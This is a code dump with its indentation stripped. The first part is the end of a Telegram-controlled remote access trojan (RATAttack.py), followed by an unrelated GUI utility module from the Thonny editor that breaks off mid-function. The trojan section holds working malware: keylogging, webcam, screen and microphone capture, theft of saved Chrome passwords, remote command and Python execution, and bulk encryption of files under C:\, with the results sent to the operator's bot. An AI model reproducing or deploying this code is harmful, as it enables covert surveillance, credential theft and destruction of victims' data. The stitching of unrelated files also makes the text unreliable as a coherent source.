t.write(decodedBytes)
t.close()
def runStackedSchedule(everyNSeconds):
for k in schedule.keys():
if k < datetime.datetime.now():
handle(schedule[k])
del schedule[k]
threading.Timer(everyNSeconds, runStackedSchedule).start()
def internalIP():
internal_ip = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
internal_ip.connect(('google.com', 0))
return internal_ip.getsockname()[0]
def checkchat_id(chat_id):
return len(known_ids) == 0 or str(chat_id) in known_ids
def get_curr_window():
user32 = ctypes.windll.user32
kernel32 = ctypes.windll.kernel32
hwnd = user32.GetForegroundWindow()
pid = ctypes.c_ulong(0)
user32.GetWindowThreadProcessId(hwnd, ctypes.byref(pid))
process_id = "%d" % pid.value
executable = ctypes.create_string_buffer(512)
h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
ctypes.windll.psapi.GetModuleBaseNameA(h_process, None, ctypes.byref(executable), 512)
window_title = ctypes.create_string_buffer(512)
length = user32.GetWindowTextA(hwnd, ctypes.byref(window_title), 512)
pid_info = "\n[ PID %s - %s - %s ]" % (process_id, executable.value, window_title.value)
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
return pid_info
def false_event(event):
return False
def true_event(event):
return True
def pressed_chars(event):
data = None
global curr_window
if event.WindowName != curr_window:
curr_window = event.WindowName
fp = open(keylogs_file, 'a')
data = get_curr_window()
fp.write(data + "\n")
fp.close()
if event and type(event.Ascii) == int:
f = open(keylogs_file,"a")
if len(event.GetKey()) > 1:
tofile = '<'+event.GetKey()+'>'
else:
tofile = event.GetKey()
if tofile == '<Return>':
print(tofile)
else:
stdout.write(tofile)
f.write(tofile)
f.close()
return not keyboardFrozen
def split_string(n, st):
lst = ['']
for i in str(st):
l = len(lst) - 1
if len(lst[l]) < n:
lst[l] += i
else:
lst += [i]
return lst
def send_safe_message(bot, chat_id, message):
while(True):
try:
cd.log('n','Message sent:\n{}'.format(bot.sendMessage(chat_id, message)),True)
break
except:
pass
def handle(msg):
chat_id = msg['chat']['id']
if checkchat_id(chat_id):
response = ''
if 'text' in msg:
cd.log('n','\n\t\tGot message from ' + str(chat_id) + ': ' + msg['text'] + '\n\n',True)
command = msg['text']
try:
if command == '/arp':
response = ''
bot.sendChatAction(chat_id, 'typing')
lines = os.popen('arp -a -N ' + internalIP())
for line in lines:
line.replace('\n\n', '\n')
response += line
elif command == '/capture_webcam':
bot.sendChatAction(chat_id, 'typing')
camera = cv2.VideoCapture(0)
while True:
return_value,image = camera.read()
gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
cv2.imshow('image',gray)
if cv2.waitKey(1)& 0xFF == ord('s'):
cv2.imwrite('webcam.jpg',image)
break
camera.release()
cv2.destroyAllWindows()
bot.sendChatAction(chat_id, 'upload_photo')
bot.sendDocument(chat_id, open('webcam.jpg', 'rb'))
os.remove('webcam.jpg')
elif command == '/capture_pc':
bot.sendChatAction(chat_id, 'typing')
screenshot = ImageGrab.grab()
screenshot.save('screenshot.jpg')
bot.sendChatAction(chat_id, 'upload_photo')
bot.sendDocument(chat_id, open('screenshot.jpg', 'rb'))
os.remove('screenshot.jpg')
elif command.startswith('/cmd_exec'):
cd.log('w','Command exec prep')
process = Popen(['cmd'], stdin=PIPE, stdout=PIPE)
command = command.replace('/cmd_exec', '')
cd.log('w','Executing the command '+command)
if len(command) > 1:
process.stdin.write(bytes(command + '\n'))
process.stdin.close()
lines = process.stdout.readlines()
for l in lines:
response += l
else:
response = '/cmd_exec dir'
elif command.startswith('/cd'):
command = command.replace('/cd ','')
try:
os.chdir(command)
response = os.getcwd() + '>'
except:
response = 'No subfolder matching ' + command
elif command.startswith('/delete'):
command = command.replace('/delete', '')
path_file = command.strip()
try:
os.remove(path_file)
response = 'Succesfully removed file'
except:
try:
os.rmdir(path_file)
response = 'Succesfully removed folder'
except:
try:
shutil.rmtree(path_file)
response = 'Succesfully removed folder and it\'s files'
except:
response = 'File not found'
elif command == '/dns':
bot.sendChatAction(chat_id, 'typing')
lines = os.popen('ipconfig /displaydns')
for line in lines:
line.replace('\n\n', '\n')
response += line
elif command.startswith('/download'):
bot.sendChatAction(chat_id, 'typing')
path_file = command.replace('/download', '')
path_file = path_file[1:]
if path_file == '':
response = '/download C:/path/to/file.name or /download file.name'
else:
bot.sendChatAction(chat_id, 'upload_document')
try:
bot.sendDocument(chat_id, open(path_file, 'rb'))
except:
try:
bot.sendDocument(chat_id, open(hide_folder + '\\' + path_file))
response = 'Found in hide_folder: ' + hide_folder
except:
response = 'Could not find ' + path_file
elif command.endswith('code_all'):
cd.log('w','Data encryption option.')
parentDirectory = 'C:\\'
for root, dirs, files in os.walk(parentDirectory):
for afile in files:
full_path = os.path.join(root, afile)
if command.startswith('/en'):
cd.log('w','WARNING ABOUT TO ENCRYPT DATA!!!! IN '+str(full_path))
encode(full_path)
elif command.startswith('/de') and full_path.endswith('.nxr'):#our extension (been encoded)
decode(full_path)
response = 'Files ' + command[1:3] + 'coded succesfully.'
elif command.startswith('/cp'):
command = command.replace('/cp', '')
command = command.strip()
if len(command) > 0:
try:
file1 = command.split('"')[1]
file2 = command.split('"')[3]
copyfile(file1, file2)
response = 'Files copied succesfully.'
except Exception as e:
response = 'Error: \n' + str(e)
else:
response = 'Usage: \n/cp "C:/Users/DonaldTrump/Desktop/porn.jpg" "C:/Users/DonaldTrump/AppData/Roaming/Microsoft Windows/[pornography.jpg]"'
response += '\n\nDouble-Quotes are needed in both whitespace-containing and not containing path(s)'
elif command.endswith('freeze_keyboard'):
global keyboardFrozen
keyboardFrozen = not command.startswith('/un')
hookManager.KeyAll = lambda event: not keyboardFrozen
response = 'Keyboard is now '
if keyboardFrozen:
response += 'disabled. To enable, use /unfreeze_keyboard'
else:
cd.log('w','Keyboard frozen')
response += 'enabled'
elif command.endswith('freeze_mouse'):
if mouseFrozen == False:
mse = pyHook.HookManager()
mse.MouseAll = false_event
mse.KeyAll = false_event
mse.HookMouse()
mse.HookKeyboard()
pythoncom.PumpMessages()
response += 'enabled. To disable use /unfreeze_mouse'
elif mouseFrozen == True:
cd.log('w','Keyboard frozen')
response += 'enabled. To disable, use /unfreeze_mouse'
else:
response += 'The script has commited the act of death'
elif command.endswith('unfreeze_mouse'):
if mouseFrozen == True:
mse = pyHook.HookManager()
mse.MouseAll = true_event
mse.KeyAll = true_event
mse.HookMouse()
mse.HookKeyboard()
pythoncom.PumpMessages()
response += 'disabled. To enable use /freeze_mouse'
elif mouseFrozen == False:
response += 'already disabled. To enable, use /freeze_mouse'
else:
response += 'The script has commited the act of death'
elif command == '/get_chrome':
con = sqlite3.connect(os.path.expanduser('~') + r'\AppData\Local\Google\Chrome\User Data\Default\Login Data')
cursor = con.cursor()
cursor.execute("SELECT origin_url,username_value,password_value from logins;")
for users in cursor.fetchall():
response += 'Website: ' + users[0] + '\n'
response += 'Username: ' + users[1] + '\n'
response += 'Password: ' + str(win32crypt.CryptUnprotectData(users[2], None, None, None, 0)) + '\n\n'
# """
# pass
elif command.startswith('/hear'):
try:
SECONDS = -1
try:
SECONDS = int(command.replace('/hear','').strip())
except:
SECONDS = 5
CHANNELS = 2
CHUNK = 1024
FORMAT = pyaudio.paInt16
RATE = 44100
audio = pyaudio.PyAudio()
bot.sendChatAction(chat_id, 'typing')
stream = audio.open(format=FORMAT, channels=CHANNELS,
rate=RATE, input=True,
frames_per_buffer=CHUNK)
frames = []
for i in range(0, int(RATE / CHUNK * SECONDS)):
data = stream.read(CHUNK)
frames.append(data)
stream.stop_stream()
stream.close()
audio.terminate()
wav_path = hide_folder + '\\mouthlogs.wav'
waveFile = wave.open(wav_path, 'wb')
waveFile.setnchannels(CHANNELS)
waveFile.setsampwidth(audio.get_sample_size(FORMAT))
waveFile.setframerate(RATE)
waveFile.writeframes(b''.join(frames))
waveFile.close()
bot.sendChatAction(chat_id, 'upload_document')
except OSError:
cd.log('e','Unable to listen in - there is probably no input device.')
response = 'unable to listen in - there is probably no input device'
#bot.sendAudio(chat_id, audio=open(wav_path, 'rb'))
elif command == '/ip_info':
bot.sendChatAction(chat_id, 'find_location')
info = requests.get('http://ipinfo.io').text #json format
location = (loads(info)['loc']).split(',')
bot.sendLocation(chat_id, location[0], location[1])
import string
import re
response = 'External IP: '
response += "".join(filter(lambda char: char in string.printable, info))
response = re.sub('[:,{}\t\"]', '', response)
response += '\n' + 'Internal IP: ' + '\n\t' + internalIP()
elif command == '/keylogs':
bot.sendChatAction(chat_id, 'upload_document')
bot.sendDocument(chat_id, open(keylogs_file, "rb"))
elif command.startswith('/ls'):
bot.sendChatAction(chat_id, 'typing')
command = command.replace('/ls', '')
command = command.strip()
files = []
if len(command) > 0:
files = os.listdir(command)
else:
files = os.listdir(os.getcwd())
human_readable = ''
for file in files:
human_readable += file + '\n'
response = human_readable
elif command.startswith('/msg_box'):
message = command.replace('/msg_box', '')
if message == '':
response = '/msg_box yourText'
else:
ctypes.windll.user32.MessageBoxW(0, message, u'Information', 0x40)
response = 'MsgBox displayed'
elif command.startswith('/mv'):
command = command.replace('/mv', '')
if len(command) > 0:
try:
file1 = command.split('"')[1]
file2 = command.split('"')[3]
move(file1, file2)
response = 'Files moved succesfully.'
except Exception as e:
response = 'Error: \n' + str(e)
else:
response = 'Usage: \n/mv "C:/Users/DonaldTrump/Desktop/porn.jpg" "C:/Users/DonaldTrump/AppData/Roaming/Microsoft Windows/[pornography.jpg]"'
response += '\n\nDouble-Quotes are needed in both whitespace-containing and not containing path(s)'
elif command == '/pc_info':
bot.sendChatAction(chat_id, 'typing')
info = ''
for pc_info in platform.uname():
info += '\n' + pc_info
info += '\n' + 'Username: ' + getpass.getuser()
response = info
elif command == '/ping':
response = platform.uname()[1] + ': I\'m up'
elif command.startswith('/play'):
command = command.replace('/play', '')
command = command.strip()
if len(command) > 0:
systemCommand = 'start \"\" \"https://www.youtube.com/embed/'
systemCommand += command
systemCommand += '?autoplay=1&showinfo=0&controls=0\"'
if os.system(systemCommand) == 0:
response = 'YouTube video is now playing'
else:
response = 'Failed playing YouTube video'
else:
response = '/play <VIDEOID>\n/play A5ZqNOJbamU'
elif command == '/proxy':
threading.Thread(target=proxy.main).start()
info = requests.get('http://ipinfo.io').text #json format
ip = (loads(info)['ip'])
response = 'Proxy succesfully setup on ' + ip + ':8081'
elif command == '/pwd':
response = os.getcwd()
elif command.startswith('/python_exec'):
command = command.replace('/python_exec','').strip()
if len(command) == 0:
response = 'Usage: /python_exec print(\'printing\')'
else:
cd.log('w','Executing python command')
from StringIO import StringIO
import sys
old_stderr = sys.stderr
old_stdout = sys.stdout
sys.stderr = mystderr = StringIO()
sys.stdout = mystdout = StringIO()
exec(command in globals())
if mystderr.getvalue() != None:
response += mystderr.getvalue()
if mystdout.getvalue() != None:
response += mystdout.getvalue()
sys.stderr = old_stderr
sys.stdout = old_stdout
if response == '':
response = 'Expression executed. No return or malformed expression.'
elif command == '/reboot':
bot.sendChatAction(chat_id, 'typing')
command = os.popen('shutdown /r /f /t 0')
response = 'Computer will be restarted NOW.'
elif command.startswith('/run'):
bot.sendChatAction(chat_id, 'typing')
path_file = command.replace('/run', '')
path_file = path_file[1:]
if path_file == '':
response = '/run_file C:/path/to/file'
else:
try:
os.startfile(path_file)
response = 'File ' + path_file + ' has been run'
except:
try:
os.startfile(hide_folder + '\\' + path_file)
response = 'File ' + path_file + ' has been run from hide_folder'
except:
response = 'File not found'
elif command.startswith('/schedule'):
command = command.replace('/schedule', '')
if command == '':
response = '/schedule 2017 12 24 23 59 /msg_box happy christmas'
else:
scheduleDateTimeStr = command[1:command.index('/') - 1]
scheduleDateTime = datetime.datetime.strptime(scheduleDateTimeStr, '%Y %m %d %H %M')
scheduleMessage = command[command.index('/'):]
schedule[scheduleDateTime] = {'text' : scheduleMessage, 'chat' : { 'id' : chat_id }}
response = 'Schedule set: ' + scheduleMessage
runStackedSchedule(10)
elif command == '/self_destruct':
bot.sendChatAction(chat_id, 'typing')
global destroy
destroy = True
response = 'You sure? Type \'/destroy\' to proceed.'
elif command == '/shutdown':
bot.sendChatAction(chat_id, 'typing')
command = os.popen('shutdown /s /f /t 0')
response = 'Computer will be shutdown NOW.'
elif command == '/destroy' and destroy == True:
bot.sendChatAction(chat_id, 'typing')
if os.path.exists(hide_folder):
rmtree(hide_folder)
if os.path.isfile(target_shortcut):
os.remove(target_shortcut)
os._exit(0)
elif command == '/tasklist':
lines = os.popen('tasklist /FI \"STATUS ne NOT RESPONDING\"')
response2 = ''
for line in lines:
line.replace('\n\n', '\n')
if len(line)>2000:
response2 +=line
else:
response += line
response += '\n' + response2
elif command.startswith('/to'):
command = command.replace('/to','')
import winsound
winsound.Beep(440, 300)
if command == '':
response = '/to <COMPUTER_1_NAME>, <COMPUTER_2_NAME> /msg_box Hello HOME-PC and WORK-PC'
else:
targets = command[:command.index('/')]
if platform.uname()[1] in targets:
command = command.replace(targets, '')
msg = {'text' : command, 'chat' : { 'id' : chat_id }}
handle(msg)
elif command == '/update':
proc_name = app_name + '.exe'
if not os.path.exists(hide_folder + '\\updated.exe'):
response = 'Send updated.exe first.'
else:
for proc in psutil.process_iter():
# check whether the process name matches
if proc.name() == proc_name:
proc.kill()
os.rename(hide_folder + '\\' + proc_name, hide_folder + '\\' + proc_name + '.bak')
os.rename(hide_folder + '\\updated.exe', hide_folder + '\\' + proc_name)
os.system(hide_folder + '\\' + proc_name)
sys.exit()
elif command.startswith('/wallpaper'):
command = command.replace('/wallpaper', '')
command = command.strip()
if len(command) == 0:
response = 'Usage: /wallpaper C:/Users/User/Desktop/porn.jpg'
elif command.startswith('http'):
image = command.rsplit('/',1)[1]
image = hide_folder + '/' + image
urllib.urlretrieve(command, image)
ctypes.windll.user32.SystemParametersInfoW(20, 0, image, 3)
else:
ctypes.windll.user32.SystemParametersInfoW(20, 0, command.replace('/', '//'), 3)
response = 'Wallpaper succesfully set.'
elif command == '/help':
# functionalities dictionary: command:arguments
functionalities = { '/arp' : '', \
'/capture_pc' : '', \
'/cmd_exec' : '<command_chain>', \
'/cd':'<target_dir>', \
'/decode_all':'', \
'/delete':'<target_file>', \
'/dns':'', \
'/download':'<target_file>', \
'/encode_all':'', \
'/freeze_keyboard':'', \
'/freeze_mouse':'', \
'/get_chrome':'', \
'/hear':'[time in seconds, default=5s]', \
'/ip_info':'', \
'/keylogs':'', \
'/ls':'[target_folder]', \
'/msg_box':'<text>', \
'/pc_info':'', \
'/play':'<youtube_videoId>', \
'/proxy':'', \
'/pwd':'', \
'/python_exec':'<command_chain>', \
'/reboot':'', \
'/run':'<target_file>', \
'/self_destruct':'', \
'/shutdown':'', \
'/tasklist':'', \
'/to':'<target_computer>, [other_target_computer]',\
'/update':'',\
'/wallpaper':'<target_file>'}
response = "\n".join(command + ' ' + description for command,description in sorted(functionalities.items()))
else: # redirect to /help
cd.log('w','BOT MISUSE: Invalid command')
msg = {'text' : '/help', 'chat' : { 'id' : chat_id }}
handle(msg)
except Exception as e:
cd.log('e','BOT MISUSE: Unknown error running command or function.')
cd.log('z','Details from previous error'+str(e))
#raise
cd.log('n','Command {} ran'.format(command))
else: # Upload a file to target
file_name = ''
file_id = None
if 'document' in msg:
file_name = msg['document']['file_name']
file_id = msg['document']['file_id']
elif 'photo' in msg:
file_time = int(time.time())
file_id = msg['photo'][1]['file_id']
file_name = file_id + '.jpg'
file_path = bot.getFile(file_id=file_id)['file_path']
link = 'https://api.telegram.org/file/bot' + str(token) + '/' + file_path
file = (requests.get(link, stream=True)).raw
with open(hide_folder + '\\' + file_name, 'wb') as out_file:
copyfileobj(file, out_file)
response = 'File saved as ' + file_name
if response != '':
responses = split_string(4096, response)
for resp in responses:
send_safe_message(bot, chat_id, resp)#
if token == 'xx:xx': cd.log('e','Token has not been set, open up RATAttack.py and change the token - then recompile (if applicable).'); raise Exception('Token not set')
cd.log('s','Setup done')
cd.log('i','Starting')
bot = telepot.Bot(token)
bot.message_loop(handle)
if len(known_ids) > 0:
helloWorld = platform.uname()[1] + ": I'm up."
for known_id in known_ids: send_safe_message(bot, known_id, helloWorld)
print(helloWorld)
cd.log('s','Started')
cd.log('i','Listening for commands on ' + platform.uname()[1] + '...')
hookManager = pyHook.HookManager()
hookManager.KeyDown = pressed_chars
hookManager.HookKeyboard()
pythoncom.PumpMessages()
|
ui_utils.py
|
# -*- coding: utf-8 -*-
import collections
import logging
import os
import platform
import re
import shutil
import signal
import subprocess
import textwrap
import threading
import time
import tkinter as tk
import tkinter.font
import traceback
from tkinter import filedialog, messagebox, ttk
from typing import Callable, List, Optional, Tuple, Union # @UnusedImport
from thonny import get_workbench, misc_utils, tktextext
from thonny.common import TextRange
from thonny.misc_utils import running_on_linux, running_on_mac_os, running_on_windows
from thonny.tktextext import TweakableText
import sys
from _tkinter import TclError
import webbrowser
class CustomMenubar(ttk.Frame):
def __init__(self, master):
ttk.Frame.__init__(self, master, style="CustomMenubar.TFrame")
self._menus = []
self._opened_menu = None
ttk.Style().map(
"CustomMenubarLabel.TLabel",
background=[
("!active", lookup_style_option("Menubar", "background", "gray")),
(
"active",
lookup_style_option("Menubar", "activebackground", "LightYellow"),
),
],
foreground=[
("!active", lookup_style_option("Menubar", "foreground", "black")),
("active", lookup_style_option("Menubar", "activeforeground", "black")),
],
)
def add_cascade(self, label, menu):
label_widget = ttk.Label(
self,
style="CustomMenubarLabel.TLabel",
text=label,
padding=[6, 3, 6, 2],
font="TkDefaultFont",
)
if len(self._menus) == 0:
padx = (6, 0)
else:
padx = 0
label_widget.grid(row=0, column=len(self._menus), padx=padx)
def enter(event):
label_widget.state(("active",))
# Don't know how to open this menu when another menu is open
# another tk_popup just doesn't work unless old menu is closed by click or Esc
# https://stackoverflow.com/questions/38081470/is-there-a-way-to-know-if-tkinter-optionmenu-dropdown-is-active
# unpost doesn't work in Win and Mac: https://www.tcl.tk/man/tcl8.5/TkCmd/menu.htm#M62
# print("ENTER", menu, self._opened_menu)
if self._opened_menu is not None:
self._opened_menu.unpost()
click(event)
def leave(event):
label_widget.state(("!active",))
def click(event):
try:
# print("Before")
self._opened_menu = menu
menu.tk_popup(
label_widget.winfo_rootx(),
label_widget.winfo_rooty() + label_widget.winfo_height(),
)
finally:
# print("After")
self._opened_menu = None
label_widget.bind("<Enter>", enter, True)
label_widget.bind("<Leave>", leave, True)
label_widget.bind("<1>", click, True)
self._menus.append(menu)
class AutomaticPanedWindow(tk.PanedWindow):
"""
Enables inserting panes according to their position_key-s.
Automatically adds/removes itself to/from its master AutomaticPanedWindow.
Fixes some style glitches.
"""
def __init__(self, master, position_key=None, preferred_size_in_pw=None, **kwargs):
tk.PanedWindow.__init__(self, master, **kwargs)
self._pane_minsize = 100
self.position_key = position_key
self._restoring_pane_sizes = False
self._last_window_size = (0, 0)
self._full_size_not_final = True
self._configure_binding = self.bind("<Configure>", self._on_window_resize, True)
self._update_appearance_binding = self.bind(
"<<ThemeChanged>>", self._update_appearance, True
)
self.bind("<B1-Motion>", self._on_mouse_dragged, True)
self._update_appearance()
# should be in the end, so that it can be detected when
# constructor hasn't completed yet
self.preferred_size_in_pw = preferred_size_in_pw
def insert(self, pos, child, **kw):
kw.setdefault("minsize", self._pane_minsize)
if pos == "auto":
# According to documentation I should use self.panes()
# but this doesn't return expected widgets
for sibling in sorted(
self.pane_widgets(),
key=lambda p: p.position_key if hasattr(p, "position_key") else 0,
):
if (
not hasattr(sibling, "position_key")
or sibling.position_key == None
or sibling.position_key > child.position_key
):
pos = sibling
break
else:
pos = "end"
if isinstance(pos, tk.Widget):
kw["before"] = pos
self.add(child, **kw)
def add(self, child, **kw):
kw.setdefault("minsize", self._pane_minsize)
tk.PanedWindow.add(self, child, **kw)
self._update_visibility()
self._check_restore_preferred_sizes()
def remove(self, child):
tk.PanedWindow.remove(self, child)
self._update_visibility()
self._check_restore_preferred_sizes()
def forget(self, child):
tk.PanedWindow.forget(self, child)
self._update_visibility()
self._check_restore_preferred_sizes()
def destroy(self):
self.unbind("<Configure>", self._configure_binding)
self.unbind("<<ThemeChanged>>", self._update_appearance_binding)
tk.PanedWindow.destroy(self)
def is_visible(self):
if not isinstance(self.master, AutomaticPanedWindow):
return self.winfo_ismapped()
else:
return self in self.master.pane_widgets()
def pane_widgets(self):
result = []
for pane in self.panes():
# pane is not the widget but some kind of reference object
assert not isinstance(pane, tk.Widget)
result.append(self.nametowidget(str(pane)))
return result
def _on_window_resize(self, event):
if event.width < 10 or event.height < 10:
return
window = self.winfo_toplevel()
window_size = (window.winfo_width(), window.winfo_height())
initializing = hasattr(window, "initializing") and window.initializing
if (
not initializing
and not self._restoring_pane_sizes
and (window_size != self._last_window_size or self._full_size_not_final)
):
self._check_restore_preferred_sizes()
self._last_window_size = window_size
def _on_mouse_dragged(self, event):
if event.widget == self and not self._restoring_pane_sizes:
self._update_preferred_sizes()
def _update_preferred_sizes(self):
for pane in self.pane_widgets():
if getattr(pane, "preferred_size_in_pw", None) is not None:
if self.cget("orient") == "horizontal":
current_size = pane.winfo_width()
else:
current_size = pane.winfo_height()
if current_size > 20:
pane.preferred_size_in_pw = current_size
# paneconfig width/height effectively puts
# unexplainable maxsize to some panes
# if self.cget("orient") == "horizontal":
# self.paneconfig(pane, width=current_size)
# else:
# self.paneconfig(pane, height=current_size)
#
# else:
# self.paneconfig(pane, width=1000, height=1000)
def _check_restore_preferred_sizes(self):
window = self.winfo_toplevel()
if getattr(window, "initializing", False):
return
try:
self._restoring_pane_sizes = True
self._restore_preferred_sizes()
finally:
self._restoring_pane_sizes = False
def _restore_preferred_sizes(self):
total_preferred_size = 0
panes_without_preferred_size = []
panes = self.pane_widgets()
for pane in panes:
if not hasattr(pane, "preferred_size_in_pw"):
# child isn't fully constructed yet
return
if pane.preferred_size_in_pw is None:
panes_without_preferred_size.append(pane)
# self.paneconfig(pane, width=1000, height=1000)
else:
total_preferred_size += pane.preferred_size_in_pw
# Without updating pane width/height attribute
# the preferred size may lose effect when squeezing
# non-preferred panes too small. Also zooming/unzooming
# changes the supposedly fixed panes ...
#
# but
# paneconfig width/height effectively puts
# unexplainable maxsize to some panes
# if self.cget("orient") == "horizontal":
# self.paneconfig(pane, width=pane.preferred_size_in_pw)
# else:
# self.paneconfig(pane, height=pane.preferred_size_in_pw)
assert len(panes_without_preferred_size) <= 1
size = self._get_size()
if size is None:
return
leftover_size = self._get_size() - total_preferred_size
used_size = 0
for i, pane in enumerate(panes[:-1]):
used_size += pane.preferred_size_in_pw or leftover_size
self._place_sash(i, used_size)
used_size += int(str(self.cget("sashwidth")))
def _get_size(self):
if self.cget("orient") == tk.HORIZONTAL:
result = self.winfo_width()
else:
result = self.winfo_height()
if result < 20:
# Not ready yet
return None
else:
return result
def _place_sash(self, i, distance):
if self.cget("orient") == tk.HORIZONTAL:
self.sash_place(i, distance, 0)
else:
self.sash_place(i, 0, distance)
def _update_visibility(self):
if not isinstance(self.master, AutomaticPanedWindow):
return
if len(self.panes()) == 0 and self.is_visible():
self.master.forget(self)
if len(self.panes()) > 0 and not self.is_visible():
self.master.insert("auto", self)
def _update_appearance(self, event=None):
self.configure(sashwidth=lookup_style_option("Sash", "sashthickness", 10))
self.configure(background=lookup_style_option("TPanedWindow", "background"))
class ClosableNotebook(ttk.Notebook):
def __init__(self, master, style="ButtonNotebook.TNotebook", **kw):
super().__init__(master, style=style, **kw)
self.tab_menu = self.create_tab_menu()
self._popup_index = None
self.pressed_index = None
self.bind("<ButtonPress-1>", self._letf_btn_press, True)
self.bind("<ButtonRelease-1>", self._left_btn_release, True)
if running_on_mac_os():
self.bind("<ButtonPress-2>", self._right_btn_press, True)
self.bind("<Control-Button-1>", self._right_btn_press, True)
else:
self.bind("<ButtonPress-3>", self._right_btn_press, True)
# self._check_update_style()
def create_tab_menu(self):
menu = tk.Menu(
self.winfo_toplevel(), tearoff=False, **get_style_configuration("Menu")
)
menu.add_command(label="Close", command=self._close_tab_from_menu)
menu.add_command(label="Close others", command=self._close_other_tabs)
menu.add_command(label="Close all", command=self.close_tabs)
return menu
def _letf_btn_press(self, event):
try:
elem = self.identify(event.x, event.y)
index = self.index("@%d,%d" % (event.x, event.y))
if "closebutton" in elem:
self.state(["pressed"])
self.pressed_index = index
except Exception:
# may fail, if clicked outside of tab
return
def _left_btn_release(self, event):
if not self.instate(["pressed"]):
return
try:
elem = self.identify(event.x, event.y)
index = self.index("@%d,%d" % (event.x, event.y))
except Exception:
# may fail, when mouse is dragged
return
else:
if "closebutton" in elem and self.pressed_index == index:
self.close_tab(index)
self.state(["!pressed"])
finally:
self.pressed_index = None
def _right_btn_press(self, event):
try:
index = self.index("@%d,%d" % (event.x, event.y))
self._popup_index = index
self.tab_menu.tk_popup(*self.winfo_toplevel().winfo_pointerxy())
except Exception:
logging.exception("Opening tab menu")
def _close_tab_from_menu(self):
self.close_tab(self._popup_index)
def _close_other_tabs(self):
self.close_tabs(self._popup_index)
def close_tabs(self, except_index=None):
for tab_index in reversed(range(len(self.winfo_children()))):
if except_index is not None and tab_index == except_index:
continue
else:
self.close_tab(tab_index)
def close_tab(self, index):
child = self.get_child_by_index(index)
if hasattr(child, "close"):
child.close()
else:
self.forget(index)
child.destroy()
def get_child_by_index(self, index):
tab_id = self.tabs()[index]
if tab_id:
return self.nametowidget(tab_id)
else:
return None
def get_current_child(self):
child_id = self.select()
if child_id:
return self.nametowidget(child_id)
else:
return None
def focus_set(self):
editor = self.get_current_child()
if editor:
editor.focus_set()
else:
super().focus_set()
def _check_update_style(self):
style = ttk.Style()
if "closebutton" in style.element_names():
# It's done already
return
# respect if required images have been defined already
if "img_close" not in self.image_names():
img_dir = os.path.join(os.path.dirname(__file__), "res")
ClosableNotebook._close_img = tk.PhotoImage(
"img_tab_close", file=os.path.join(img_dir, "tab_close.gif")
)
ClosableNotebook._close_active_img = tk.PhotoImage(
"img_tab_close_active",
file=os.path.join(img_dir, "tab_close_active.gif"),
)
style.element_create(
"closebutton",
"image",
"img_tab_close",
("active", "pressed", "!disabled", "img_tab_close_active"),
("active", "!disabled", "img_tab_close_active"),
border=8,
sticky="",
)
style.layout(
"ButtonNotebook.TNotebook.Tab",
[
(
"Notebook.tab",
{
"sticky": "nswe",
"children": [
(
"Notebook.padding",
{
"side": "top",
"sticky": "nswe",
"children": [
(
"Notebook.focus",
{
"side": "top",
"sticky": "nswe",
"children": [
(
"Notebook.label",
{"side": "left", "sticky": ""},
),
(
"Notebook.closebutton",
{"side": "left", "sticky": ""},
),
],
},
)
],
},
)
],
},
)
],
)
def _check_remove_padding(self, kw):
# Windows themes produce 1-pixel padding to the bottom of the pane
# Don't know how to get rid of it using themes
if "padding" not in kw and ttk.Style().theme_use().lower() in (
"windows",
"xpnative",
"vista",
):
kw["padding"] = (0, 0, 0, -1)
def add(self, child, **kw):
self._check_remove_padding(kw)
super().add(child, **kw)
def insert(self, pos, child, **kw):
self._check_remove_padding(kw)
super().insert(pos, child, **kw)
class AutomaticNotebook(ClosableNotebook):
"""
Enables inserting views according to their position keys.
Remember its own position key. Automatically updates its visibility.
"""
def __init__(self, master, position_key, preferred_size_in_pw=None):
if get_workbench().get_ui_mode() == "simple":
style = "TNotebook"
else:
style = "ButtonNotebook.TNotebook"
super().__init__(master, style=style, padding=0)
self.position_key = position_key
# should be in the end, so that it can be detected when
# constructor hasn't completed yet
self.preferred_size_in_pw = preferred_size_in_pw
def add(self, child, **kw):
super().add(child, **kw)
self._update_visibility()
def insert(self, pos, child, **kw):
if pos == "auto":
for sibling in map(self.nametowidget, self.tabs()):
if (
not hasattr(sibling, "position_key")
or sibling.position_key == None
or sibling.position_key > child.position_key
):
pos = sibling
break
else:
pos = "end"
super().insert(pos, child, **kw)
self._update_visibility()
def hide(self, tab_id):
super().hide(tab_id)
self._update_visibility()
def forget(self, tab_id):
if tab_id in self.tabs() or tab_id in self.winfo_children():
super().forget(tab_id)
self._update_visibility()
def is_visible(self):
return self in self.master.pane_widgets()
def get_visible_child(self):
for child in self.winfo_children():
if str(child) == str(self.select()):
return child
return None
def _update_visibility(self):
if not isinstance(self.master, AutomaticPanedWindow):
return
if len(self.tabs()) == 0 and self.is_visible():
self.master.remove(self)
if len(self.tabs()) > 0 and not self.is_visible():
self.master.insert("auto", self)
class TreeFrame(ttk.Frame):
def __init__(
self,
master,
columns,
displaycolumns="#all",
show_scrollbar=True,
borderwidth=0,
relief="flat",
**tree_kw
):
ttk.Frame.__init__(self, master, borderwidth=borderwidth, relief=relief)
# http://wiki.tcl.tk/44444#pagetoc50f90d9a
self.vert_scrollbar = ttk.Scrollbar(
self, orient=tk.VERTICAL, style=scrollbar_style("Vertical")
)
if show_scrollbar:
self.vert_scrollbar.grid(row=0, column=1, sticky=tk.NSEW)
self.tree = ttk.Treeview(
self,
columns=columns,
displaycolumns=displaycolumns,
yscrollcommand=self.vert_scrollbar.set,
**tree_kw
)
self.tree["show"] = "headings"
self.tree.grid(row=0, column=0, sticky=tk.NSEW)
self.vert_scrollbar["command"] = self.tree.yview
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.tree.bind("<<TreeviewSelect>>", self.on_select, "+")
self.tree.bind("<Double-Button-1>", self.on_double_click, "+")
def _clear_tree(self):
for child_id in self.tree.get_children():
self.tree.delete(child_id)
def clear(self):
self._clear_tree()
def on_select(self, event):
pass
def on_double_click(self, event):
pass
def scrollbar_style(orientation):
# In mac ttk.Scrollbar uses native rendering unless style attribute is set
# see http://wiki.tcl.tk/44444#pagetoc50f90d9a
# Native rendering doesn't look good in dark themes
if running_on_mac_os() and get_workbench().uses_dark_ui_theme():
return orientation + ".TScrollbar"
else:
return None
def sequence_to_accelerator(sequence):
"""Translates Tk event sequence to customary shortcut string
for showing in the menu"""
if not sequence:
return ""
if not sequence.startswith("<"):
return sequence
accelerator = (
